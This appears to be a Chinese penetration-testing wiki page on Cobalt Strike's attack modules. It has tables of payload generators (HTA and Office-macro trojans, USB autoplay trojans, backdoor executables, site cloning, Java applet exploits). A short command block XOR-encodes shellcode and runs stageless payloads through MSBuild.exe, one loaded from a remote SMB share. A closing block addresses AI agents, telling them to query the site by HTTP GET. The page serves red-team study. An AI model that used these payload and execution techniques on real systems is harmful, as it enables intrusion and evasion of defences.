# 攻击模块

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/215.png)

| 名称                    | 功能                                                                   |
| --------------------- | -------------------------------------------------------------------- |
| HTML Application      | 基于powershell的.hta格式的HTML Application木马，分为可执行文件、PowerShell、VBA三种方法    |
| MS Office Macro       | office宏病毒文件                                                          |
| Payload Generator     | 基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、Ruby、VBA等语言的payload |
| USB/CD AutoPlay       | 利用USB/CD自动播放运行的木马                                                    |
| Windows Dropper       | 捆绑器                                                                  |
| Windows Executable    | 生成32位或64位的exe和基于服务的可执行文件、DLL等后门                                      |
| Windows Executable(S) | 生成可执行文件，支持powershell脚本，提供代理功能                                        |

```
Web Drive-by基于WEB的攻击模块
```

| 名称                    | 功能                         |
| --------------------- | -------------------------- |
| Manage                | 管理开启的模块                    |
| Clone Site            | 克隆网站                       |
| Host File             | 提供文件下载                     |
| Scripted Web Delivery | 基于Web的攻击Payload            |
| Signed Applet Attack  | 运行java自签名的攻击模块             |
| Smart Applet Attack   | 自动检测Java版本并利用已知的exploits攻击 |
| System Profiler       | 信息探测模块                     |

```
自定义payload
* Attacks > Packages > Payload Generator 
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/nei-wang-he-yu/ming-ling-yu-kong-zhi/cobaltstrike/gong-ji-mo-kuai.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.